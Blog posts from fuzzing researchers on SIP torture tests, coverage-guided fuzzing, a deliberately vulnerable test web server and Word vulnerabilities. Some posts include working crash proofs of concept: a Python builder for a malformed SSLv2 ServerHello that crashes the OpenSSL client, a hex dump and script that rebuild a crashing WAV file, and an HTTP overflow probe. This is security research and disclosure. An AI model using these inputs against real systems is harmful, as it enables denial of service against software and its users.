Fuzzing for RPC vulnerabilities

So Dave Aitel said there are no more RPC vulnerabilities because his fuzzer couldn’t find any new ones. Well, I thought it was just a matter of trying more combinations and I was right.

The point, though, is not who has a longer fuzzer, but that when it comes to security always bet against the person who says something is impossible.

In fact, I made that mistake myself back in the 1990s, claiming Windows can’t be reliably exploited (I can’t find the link in the old ntbugtraq archives – thank god for that). Little did I know how easy writing Windows exploits would become. Now if only I could get a message to my younger self to avoid that embarrassment. And if I do get to talk to my younger self, I’ll be sure to tell him to skip the 2nd and 3rd Matrix movies.


RFC 4475 is not enough

When beSTORM is used to test VoIP products, it’s usually for standard SIP, SDP and RTP fuzzing. But we were recently asked for our opinion on RFC 4475, which made for an interesting case study. RFC 4475, for those who do not know it, is an IETF document whose goal is to give examples of Session Initiation Protocol (SIP) test messages designed to exercise and “torture” a SIP implementation. This is great, but as the RFC itself states, these are just a few examples – 49 discrete examples, to be specific.

These 49 examples claim to check a broad range of problems that a SIP parser may come across, and that it should either ignore, reject or handle correctly. The examples often test more than one malformed, incorrect or problematic field at a time – opening the possibility that one problematic field prevents the others from being processed at all.

My problem with these 49 cases is that they are very tailored: each tests for something specific, without covering all the possible variations of that same example. Let’s take the Content-Length header. One example checks resilience to a negative value, another to a large positive value, yet another to the value of zero (0). Did you notice what is missing? Where, for example, are the off-by-one underflows and overflows?
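To make the point concrete, here is a minimal sketch of what systematic boundary-value generation for a single header could look like. The boundary list and the SIP message skeleton are my own illustration, not beSTORM’s actual generation logic or anything from RFC 4475:

```python
# Boundary-value generation for the SIP Content-Length header.
# The chosen boundaries and the message skeleton are illustrative.

def content_length_cases(actual_body_len):
    """Yield Content-Length values around interesting boundaries."""
    boundaries = [
        -1, 0, 1,                          # sign and zero cases
        actual_body_len - 1,               # off-by-one underflow
        actual_body_len + 1,               # off-by-one overflow
        2**15 - 1, 2**15,                  # 16-bit signed edge
        2**31 - 1, 2**31, 2**32 - 1,       # 32-bit signed/unsigned edges
    ]
    for value in boundaries:
        yield value

def build_sip_message(content_length, body=b"v=0"):
    headers = (
        "OPTIONS sip:user@example.com SIP/2.0\r\n"
        "Content-Type: application/sdp\r\n"
        f"Content-Length: {content_length}\r\n\r\n"
    )
    return headers.encode() + body

# One test message per boundary value, for a 3-byte body.
cases = [build_sip_message(v) for v in content_length_cases(3)]
```

Ten generated messages instead of the RFC’s three Content-Length cases – and that is just one header of one protocol.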

Another example is the use of IP addresses inside the sample data: carelessness or a small oversight by the tester can make the whole example invalid and unparseable by the test subject. The message might simply be discarded by the product, making the entire test worthless – while leaving the tester happy for ‘passing’ it. It’s like passing a final exam by not showing up!
In conclusion, running those 49 examples is not straightforward, and even once you have run them and passed, can you really say you are OK? From experience I can tell you that in many cases, both our customers and open source products we have tested with beSTORM passed RFC 4475 yet failed the complete fuzzing test – beSTORM simply discovered one or more vulnerabilities that didn’t fit any of the 49 torture examples provided in the RFC.

My recommendation? Testing against those 49 examples only tells you that you are compliant with RFC 4475. Only a serious fuzzer will tell you whether your product is secure against SIP, SDP or RTP based attacks.


From description to exploit

Every once in a while I get an opportunity to work on a “known” vulnerability with very little, or even no, available technical detail. These known vulnerabilities tend to be “known” only to their finder and to the vendor that fixed them. We know they exist because an advisory was published, but not much more than that.
From the point where the vulnerability is fixed, no one (researcher or vendor) has any interest in disclosing its details – it is no longer interesting – leaving security researchers with insufficient information to confirm whether the vulnerability affects anyone else besides the specific vendor, and the specific vendor version.

This is the point I reached today, when our team wanted to update a test in our vulnerability scanner to check for the exploitability of a certain vulnerability on a new platform. The version indicated the product was vulnerable, but there was no way to confirm it, as the vulnerability’s technical description was inadequate – and checking only the version is a sure way to generate a multitude of false positives.
With the little information available:
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

I was determined to discover what the “unknown vector” was, and to see whether the product I tested was in fact vulnerable or not.

The first step was to understand what exactly SSLv2 is, and how I could get my hands on it. Simple enough: “openssl s_client” was just what I needed – a sample SSL client that uses the get_server_hello() function.

Then I needed to create an SSLv2 session. This proved a bit more difficult, as SSLv2 is now considered insecure and most SSL installations disable it – Firefox no longer even allows connecting to sites that support it. Apache 2, however, hasn’t given up on it, and you can turn SSLv2 support on quite easily through the SSLProtocol directive.
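For the test host, the mod_ssl configuration was roughly the following. This is a sketch from memory rather than the exact config used; the cipher line matters because SSLv2 has its own cipher suites, and the certificate paths are placeholders:

```apache
# Test-lab only: SSLv2 is insecure and should never be enabled in production.
SSLEngine on
SSLProtocol +SSLv2 +SSLv3 +TLSv1
SSLCipherSuite ALL
SSLCertificateFile /path/to/server.crt
SSLCertificateKeyFile /path/to/server.key
```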

Once that was available, I launched beSTORM’s auto-learn mechanism and had it capture the SSLv2 traffic. A complete session can be quite extensive, but I only needed the first packets, as those are the ones the get_server_hello() function looks into. Once this was ready, I used the pcap export capability to load the captured data into Wireshark, and used Wireshark’s existing dissection to mark which field was what – which value was the length of which field, what was a flag, and so on.

Then I told beSTORM to start listening for incoming traffic and play around with the values. I mainly concentrated on the following ServerHello parameters:

  • Packet Length (total length)
  • Session ID Hit (valid values are 0x01 and 0x00)
  • Certificate Type (it is an enumeration of three possible values)
  • Certificate Length
  • Certificate Value
  • Cipher Spec Length
  • Cipher Spec Value
  • Connection ID Length
  • Connection ID Value

After a few thousand combinations – taking about 50 minutes – the openssl client crashed, with beSTORM having set the Session ID Hit to 0x00, the Certificate Type to NULL (0x00), the Certificate Length to 0, the Certificate Value to none, the Cipher Spec Length to 0, the Cipher Spec Value to none, and the Connection ID to its default captured values:

Program received signal SIGSEGV, Segmentation fault.
0x0808638d in get_server_hello (s=0x81aed90) at s2_clnt.c:542
542 if (s->session->peer != s->session->sess_cert->peer_key->x509)
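For reference, the winning combination can be reconstructed as raw bytes. The field layout below follows the SSLv2 draft specification’s SERVER-HELLO message; the connection-ID bytes are placeholders standing in for the values captured from a real session, so treat this as a sketch rather than the exact packet beSTORM produced:

```python
import struct

# Malformed SSLv2 SERVER-HELLO: no certificate, no cipher specs, but a
# session-id-hit of 0 - the combination that triggered the NULL dereference.

def malformed_server_hello(connection_id=b"\x00" * 16):
    body = struct.pack(
        ">BBBHHHH",
        0x04,                 # msg-type: SERVER-HELLO
        0x00,                 # session-id-hit: 0 (no cached session)
        0x00,                 # certificate-type: NULL instead of X.509
        0x0002,               # server-version: SSLv2
        0,                    # certificate-length: 0 (no certificate)
        0,                    # cipher-specs-length: 0 (no ciphers)
        len(connection_id),   # connection-id-length
    ) + connection_id
    # 2-byte SSLv2 record header: high bit set, 15-bit record length
    header = struct.pack(">H", 0x8000 | len(body))
    return header + body

pkt = malformed_server_hello()
```

With no certificate in the message, s->session->sess_cert is never populated, which matches the crashing dereference in the gdb output above.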

Now all I needed was to instruct beSTORM to build a module from it – job done.

From a very vague description to an exploit in about an hour :-)

An exploit can be found at:  OpenSSL SSLv2 Client Crash (NULL Reference)


PCM 0day (Divide by Zero)

The debate about the term “zero day” is not directly related to the PCM vulnerability I am about to reveal, but since this vulnerability is not publicly documented, as far as I know, I will call it a 0day.

The vulnerability allows you to crash mplay32.exe – which for some reason is still shipped with Windows up to version 2003, and maybe also Vista (can someone confirm?). This low-quality, feature-lacking player contains a problem where a malformed PCM file causes it to crash as it tries to divide a number by zero.
00000000  52 49 46 46 24 00 00 1a 57 41 56 45 66 6d 74 20  |RIFF$...WAVEfmt |
00000010  10 00 00 00 01 00 02 00 44 ac 00 00 88 58 01 00  |........D....X..|
00000020  00 00 10 00 64 61 74 61 00 00 00 1a 00 00 24 17  |....data......$.|
00000030  1e f3 3c 13 3c 14 16 f9 18 f9 34 e7 23 a6 3c f2  |..<.<.....4.#.<.|
00000040  24 f2 11 ce 1a 0d                                |$.....|
Is this vulnerability interesting? Not really – mplay32.exe is no longer the default player (unless you are still in the stone age, i.e. have never upgraded your system or Internet Explorer), and it allows you to do nothing but crash the player.
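If you want to reproduce it, the file can be rebuilt byte-for-byte from the hex dump above. Note the zero block-align field in the fmt chunk (offset 0x20) – assuming the crash description is accurate, that is the likely divisor:

```python
# Rebuild the malformed PCM WAV from the hex dump, byte for byte.
# Don't open the result with a player you care about.

MALFORMED_WAV = bytes.fromhex(
    "524946462400001a57415645666d7420"  # "RIFF....WAVEfmt " header
    "100000000100020044ac000088580100"  # fmt: PCM, 2 channels, 44100 Hz
    "00001000646174610000001a00002417"  # block align = 0 (!), then "data"
    "1ef33c133c1416f918f934e723a63cf2"  # sample data
    "24f211ce1a0d"
)

with open("crash.wav", "wb") as f:
    f.write(MALFORMED_WAV)
```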

If someone can find out more about this issue, I will be happy to hear.

BTW: this PCM vulnerability was discovered by beSTORM’s PCM (WAV) fuzzing module, which was launched against mplay32.exe.


Flayer is Google’s step toward Web application security testing

Google introduced the tool recently via its Online Security Blog.

The tool is released under GNU General Public License v2.

The home of the new project is here: code.google.com/p/flayer/

Visitors to the WOOT ’07 conference are already aware of it.


Vulnerable test application: Simple Web Server (SWS)

every once in a while (last time a few months ago) someone emails one of the mailing lists looking for an example vulnerable binary, mostly for:

- reverse engineering for vulnerabilities, as a study tool.
- testing fuzzers

some of these exist, but i asked my employer, beyond security, to release our test application, built specifically for testing fuzzing (it was built for the beSTORM fuzzer). they agreed to release the http version, following their earlier agreement to release our .ani xml specification.

the gui allows you to choose what port you want to run it on, as well as which vulnerabilities should be “active”.

it is called simple web server or sws, and has the following vulnerabilities:

1. off-by-one in content-length (integer overflow/malloc issue)
2. overflow in user-agent
3. overflow in method
4. overflow in uri
5. overflow in host
6. overflow in version
7. overflow in complete packet
8. off by one in receive function (linefeed/carriage return issue)
9. overflow in authorization type
10. overflow in base64 decoded
11. overflow in username of authorization
12. overflow in password of authorization
13. overflow in body
14. cross site scripting
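as a usage example, vulnerability #1 could be exercised with a hand-built request like the one below. since sws’s internals aren’t published, the triggering value here is a guess at the classic pattern: a length that wraps to a tiny allocation when the code adds one for a terminator:

```python
import socket

# Hypothetical probe for SWS vulnerability #1 (off-by-one / integer
# overflow in Content-Length handling). 0xFFFFFFFF is a guess: adding 1
# for a NUL terminator wraps a 32-bit size to 0 before the malloc.

def build_probe(content_length=0xFFFFFFFF):
    return (
        "POST / HTTP/1.0\r\n"
        "Host: localhost\r\n"
        f"Content-Length: {content_length}\r\n"
        "\r\n"
        "AAAA"
    ).encode()

def send_probe(host="127.0.0.1", port=80):
    """Send the probe to a running SWS instance (not called here)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(build_probe())
        return s.recv(4096)

probe = build_probe()
```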

it can be found on beyond security’s website, here:

gadi evron,


Windows screensaver lock and lecturing

i was giving a lecture at nps yesterday, and while i was unlocking my laptop (xp), suddenly, before the machine was unlocked, a file open window popped up. i could browse, and more importantly, open files. the first choice the system offered was .hlp files.

can someone say pwnage? anyone up to doing some monkey fuzzing on that interface?

gadi evron,


Mozilla’s JavaScript fuzzer – Opera’s best friend

Window Snyder, the head of security strategy at Mozilla Corporation, wrote this week about Opera’s use of Mozilla’s JavaScript fuzzer. Ms. Snyder points to a post by Claudio Santambrogio of Opera Software:

While running the tool, we found four crashers – one of which might have some security implications.

When will we read news like this from Microsoft and Apple?


FuzzGuru’s approach to fuzzing

Recently I saw a lecture by John of Microsoft about their FuzzGuru framework. Apparently their approach to fuzzing relies on tight integration with code coverage tools; in similar fashion, a recently published Microsoft Research paper, Automated Whitebox Fuzz Testing, shows that this is indeed Microsoft’s approach to fuzzing.
Though this approach seems to provide good results for Microsoft, I am not sure it is a good approach for the majority of people who develop software, as in the security testing phase there is usually little chance that the source code will be available for code coverage testing.

Some would think that binary-level code coverage might work as well. I disagree: generic code coverage will confuse the fuzzer, as it will not concentrate on the parser part of the program, which is what our fuzzer needs to test.
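To make the approach under discussion concrete, a coverage-guided mutation loop looks roughly like the toy sketch below. The target() parser and its “blocks” are invented stand-ins for a real instrumented binary; this is not FuzzGuru or beSTORM, just the general pattern:

```python
import random

# Toy coverage-guided fuzzing loop: keep any mutated input that reaches
# code the corpus has not reached before. In a real harness, coverage
# would come from instrumentation (gcov, a binary tracer, etc.).

def target(data):
    """Stand-in parser: returns the set of 'blocks' the input reached."""
    blocks = {"entry"}
    if data[:1] == b"A":
        blocks.add("header")
        if len(data) > 8:
            blocks.add("body")
    return blocks

def mutate(data):
    """Flip one random byte."""
    i = random.randrange(len(data))
    return data[:i] + bytes([random.randrange(256)]) + data[i + 1:]

def fuzz(seed, iterations=2000):
    corpus, seen = [seed], target(seed)
    for _ in range(iterations):
        candidate = mutate(random.choice(corpus))
        covered = target(candidate)
        if covered - seen:          # new coverage: keep this input
            seen |= covered
            corpus.append(candidate)
    return corpus, seen

corpus, seen = fuzz(b"XXXXXXXXXX")
```

The objection in the text is precisely about the coverage signal: if target() measured the whole program rather than its parser, the loop would happily chase code paths that have nothing to do with input handling.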

We’ve been toying with the idea of implementing both source code coverage and binary code coverage in beSTORM but I’m not sure I’m convinced yet that the code coverage approach is beneficial.


.ANI fuzzing module released

after being challenged by Sunshine, we decided to make the beSTORM .ani file fuzzing module description publicly available.

this module is interesting because microsoft’s fuzzing team, using a template-based fuzzing module, missed during their testing a vulnerability that turned out to be a zero-day. we built ours by simply feeding a few sample files into beSTORM and using its autolearn feature to produce a file fuzzing module. the module we produced does catch the 0-day, but we welcome any feedback as to how good or bad this module actually is.

the fuzzing module description is available here.


The Future of Fuzzing (from Fuzzing and Code Coverage)

kowsik guruswami sent a message today to dd about using code coverage to help build better fuzzers.

i have many thoughts on this subject. here is my reply email:

on mon, 26 mar 2007, kowsik wrote:
> we just released rcov-0.1, an interactive/incremental code coverage
> tool to assist in building effective fuzzers.
> quick summary:
> – it’s a webrick browser-based application (ruby)
> – uses gcov’s notes/data files to get at blocks and function summaries
> – interactively/incrementally shows the coverage information while fuzzing
> – uses ctags to cross reference functions/prototypes/definitions/macros

hi kowsik, thanks for this.

i have a few notes though, as i believe this can be taken much further (at least my studies so far show that).

we have three levels or layers (depends on approach):
1. building better fuzzers (which you cover).
2. helping the fuzzing process, fuzzing better.
3. making it easier to find the actual vulnerability once an indication is found (a successful test case – or, as they say in qa, a passing one).

several folks in the past few months have said that fuzzing isn’t new and has been done for years – that much is true.

some folks also said that fuzzing is as simple as it gets and has nowhere left to evolve. that is very much false.

code coverage, static analysis, run-time analysis.. etc. all have a place in the future of fuzzing.
i see fuzzer development in the coming years changing the term “dumb fuzzing” to mean today’s protocol-based smart fuzzing, with “smart fuzzing” coming to mean the interactive changes that happen as you fuzz.

the most we see today (in most cases) is the engine running undisturbed, while the monitor (if one even exists) is a simple debugger.

evolving host and network monitoring to use profiling technologies, map functions and paths, watch for memory issues, etc. is fast coming.

today, changing the actions of a fuzzer as it is running is difficult (there is no real driver, just an engine). a simple example of this evolution could be watching cpu usage. if the cpu usage spikes, it could mean:
1. we are sending too many requests per second – we should slow down the engine.
2. (if it spikes for the target’s own thread) we are on to something: we should explore this attack further (likely one of the 10000 “attacks” we just went through), or switch to a different fuzzing engine to explore that particular section of the program (as we mapped it – code coverage again).
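the heuristic above can be sketched as a trivial driver policy. the thresholds and the rate-halving step are made-up illustrations, not taken from any real fuzzer:

```python
# Toy "driver" policy for the cpu-spike heuristic: given a global cpu
# reading and the target thread's own cpu reading (percentages), decide
# whether to throttle the engine or flag the case for exploration.

def adjust(global_cpu, thread_cpu, requests_per_sec):
    if thread_cpu > 90:
        # the target's own thread is spinning: flag this test case
        # for deeper exploration, possibly with a different engine
        return requests_per_sec, "explore"
    if global_cpu > 90:
        # the whole box is saturated: we are simply sending too fast
        return max(1, requests_per_sec // 2), "throttle"
    return requests_per_sec, "continue"

rate, action = adjust(global_cpu=95, thread_cpu=20, requests_per_sec=200)
```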

the two don’t easily work together, not to mention even stopping a fuzzer, rewinding it or god forbid running a different one at the same time (on the same instance anyway).

which brings us to distributed fuzzing… but that’s a whole different subject yet again.

fuzzing has a long way to go, and we haven’t even really started to explore full integration with static analysis tools (other than with their results).

we had a discussion on the fuzzing mailing list recently about genetic fuzzing, but i am not really a math geek. jared can explain that one better… and so on.

all that before we explore uses for fuzzing outside of the development cycle (mostly security qa) and vulnerability research – such as client-side testing. perhaps fuzzers will help us force the hand of software vendors to develop more robust and secure code.

working for a fuzzing vendor, i am only too familiar with the turing halting problem and with seeking reality in the midst of eternal runs, but the most interesting thing i found in the past few months (which wasn’t technical) is the clash of cultures between qa engineers and security professionals. it will be very interesting to see where we end up.



gadi evron,


Generating Test Cases

catchconv: symbolic execution and run-time type inference for integer conversion errors

this is an interesting paper, and it seems like the fuzzing mailing list helped out a tad bit. :)

abstract. we propose an approach that combines symbolic execution and run-time type inference from a sample program run to generate test cases, and we apply our approach to signed/unsigned conversion errors in programs. a signed/unsigned conversion error occurs when a program makes control flow decisions about a value based on treating it as a signed integer, but then later converts the value to an unsigned integer in a way that breaks the program’s implicit assumptions. our tool follows the approach of larson and austin in using an example input to pick a program path for analysis [21], and we use symbolic execution to attempt synthesis of a program input exhibiting an error [19, 17, 8, 34]. we describe a proof of concept implementation that uses the valgrind binary analysis framework and the stp decision procedure, and we report on preliminary experiences. our implementation is available at http://www.sf.net/projects/catchconv.
keywords: software security, symbolic execution, test generation, decision procedure, dynamic binary analysis
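to illustrate the bug class the paper targets, here is a small simulation of a signed/unsigned conversion error. this is my own example, not one from the paper; the 32-bit views are made explicit with struct, since python integers don’t truncate on their own:

```python
import struct

# A length field validated as a *signed* 32-bit integer but consumed as
# *unsigned*: -1 passes the size check, then becomes a huge allocation.

def as_int32(raw):
    return struct.unpack("<i", raw)[0]   # signed 32-bit view

def as_uint32(raw):
    return struct.unpack("<I", raw)[0]   # unsigned 32-bit view

def vulnerable_check(raw_len, limit=4096):
    n = as_int32(raw_len)
    if n > limit:                        # signed comparison: -1 passes
        return None                      # "too big" - rejected
    return as_uint32(raw_len)            # unsigned use: -1 -> 4294967295

alloc = vulnerable_check(struct.pack("<i", -1))
```

catchconv’s job is to synthesize an input like that -1 automatically, by tracking where a value is used with both signedness interpretations along a program path.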

gadi evron,


More CCC Presentations and Videos

other presentations i enjoyed, which i just noticed online:
pdf george danezis, introducing traffic analysis

wmv georg wicherski, automated botnet detection and mitigation

wmv gadi evron, fuzzing in the corporate world (yes, mine)

wmv ilja van sprundel, unusual bugs

pdf ilja van sprundel, unusual bugs

wmv michael steil, inside vmware

more here [mirror]. all mirrors, etc. can be found here. i hope everything becomes available soon.

gadi evron,


Test it (for security holes) before you buy it

Seems like blackbox testing tools (fuzzers) are gaining ground, but not in the way I would have expected.

I expected software and networking vendors to buy commercial fuzzers to check their products for security holes (or to use open source fuzzing tools as part of the development cycle). Surprisingly, most companies I know that have implemented fuzzers are not the ones writing code, but those who rely on other people’s products – telcos, cell phone providers, financial institutions, and equipment suppliers.

Apparently, some of these companies check 3rd party products for security holes before they install them in their network.

While this ‘certification’ attitude is expected from financial institutions, it’s pleasantly surprising to see it from equipment suppliers, for example. One large telco went as far as informing several networking equipment vendors that any new version of their networking products will undergo extensive security tests before it is purchased. Since the tests are done with a commercial fuzzing product, the networking vendor has a chance to buy a similar product and do its own testing in the development lab – saving itself the shame of having the customer find its security holes for it.

Perhaps I shouldn’t be too surprised – there have been many instances of organizations running Nessus on their networking equipment and sending the vendor a ‘report card’ with all the known vulnerabilities present in the product. But doing a quick Nessus run is very different from making security testing part of the acceptance process. At least one company has picked up on this trend – BreakingPoint‘s business model is built around companies benchmarking security products before deciding which ones to buy. Will this trend extend to testing products for security holes before deciding which ones to buy?

Another pleasant surprise is that Microsoft, who has been behind in terms of security for many years (to a point where many people, myself included, were convinced that they “just don’t get it”), has implemented a fuzzing infrastructure that is more advanced than anything else I’ve seen. A couple of networking vendors are not too far behind, but the rest of the software development world seems to be in the security testing dark ages.

This is obviously a good step for the security world – if large customers begin to pressure product vendors to develop more secure products (rather than spend marketing dollars on branding themselves as secure), product security will have a clearer ROI and the result will be more secure products.

A cynical friend of mine told me that this is yet more proof that product vendors will not take steps to increase their products’ security unless pushed to do so by external forces. I tend to think that whatever the reasons, a net result of fewer security holes is good for everyone.


These two weeks of Word flaws – can we survive?

Since 5th December we have seen three separate, serious vulnerabilities in Microsoft Word:

[Disclosed – original reference – CVE name; affected products and product versions]

Tue 5th Dec – MS Security Advisory #929433 – CVE-2006-5994 and FAQ
Word 2003/2002/2000, Word 2004/v. X for Mac, Works 2006/2005/2004, Word Viewer 2003

Sat 9th Dec – MSRC Blog entry 10th Dec – CVE-2006-6456
Word 2003/2002/2000, Word Viewer 2003

Tue 12th Dec – Fuzzing list posting – CVE-2006-6561
Word 2003/2002/2000, Word 2004/v. X for Mac, Word Viewer 2003, OpenOffice.org 2/1.1.3, AbiWord 2.2

Related to the third issue, a new sample has been submitted to VirusTotal. There are somewhat better detection results now:

# 12.15.2006 01:04:58 (CET)

AntiVir 14th Dec: EXP/W97M.DuBug
BitDefender 15th Dec: Exploit.MSWord.Gen.2
Fortinet 14th Dec: W32/CVE20065994!exploit (the CVE of 1st issue)
Ikarus 14th Dec: Exploit.MSWord.Gen.2
McAfee 14th Dec: Exploit-MSWord.c.demo
NOD32v2 14th Dec: W97M/Exploit.1Table.NAE
Panda 15th Dec: Trj/1Table.D

Symantec is not listed, but they have released Bloodhound.Exploit.108.


MoKB Wireless Driver Bug – Critical to Windows Systems

the month of kernel bugs (mokb) released an advisory (mokb-11-11-2006) today on a wireless vulnerability in broadcom’s wireless driver.

zert, in cooperation with metasploit, the sans isc and indeed, securiteam, issued an advisory on the issue, explaining why it is critical, etc.:


the advisory was written by h d moore, gadi evron (me) and johannes ullrich.

worth a read, this is serious.


gadi evron,